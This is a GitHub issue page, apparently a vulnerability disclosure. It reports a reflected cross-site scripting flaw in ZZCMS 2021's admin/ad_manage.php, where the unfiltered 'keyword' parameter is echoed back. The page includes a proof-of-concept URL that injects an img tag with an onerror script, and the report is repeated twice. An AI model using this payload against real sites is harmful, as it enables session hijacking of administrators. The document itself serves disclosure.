Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
http://www.zzcms.net/about/6.html
software link: https://github.com/Boomingjacob/ZZCMS/raw/main/zzcms2021.zip
PHP version > = 4.3.0
Mysql version>=4.0.0
In the file admin/ad_manage.php line 18.The variable $keyword can be controlled by the $_REQUEST['keyword'],then output on line 32 and it not be filtered.
admin/ad_manage.php
$keyword
$_REQUEST['keyword']
POC:
http://your-ip/admin/ad_manage.php?keyword=a"><img src=1 onerror='alert(1)'/><"
The text was updated successfully, but these errors were encountered:
No branches or pull requests
ZZCMS2021_XSS_1
PoC by rerce&rpsate
ZZCMS the lastest version download page :
http://www.zzcms.net/about/6.html
software link: https://github.com/Boomingjacob/ZZCMS/raw/main/zzcms2021.zip
Environmental requirements
PHP version > = 4.3.0
Mysql version>=4.0.0
vulnerability code:
In the file
admin/ad_manage.phpline 18.The variable$keywordcan be controlled by the$_REQUEST['keyword'],then output on line 32 and it not be filtered.POC:
http://your-ip/admin/ad_manage.php?keyword=a"><img src=1 onerror='alert(1)'/><".The text was updated successfully, but these errors were encountered: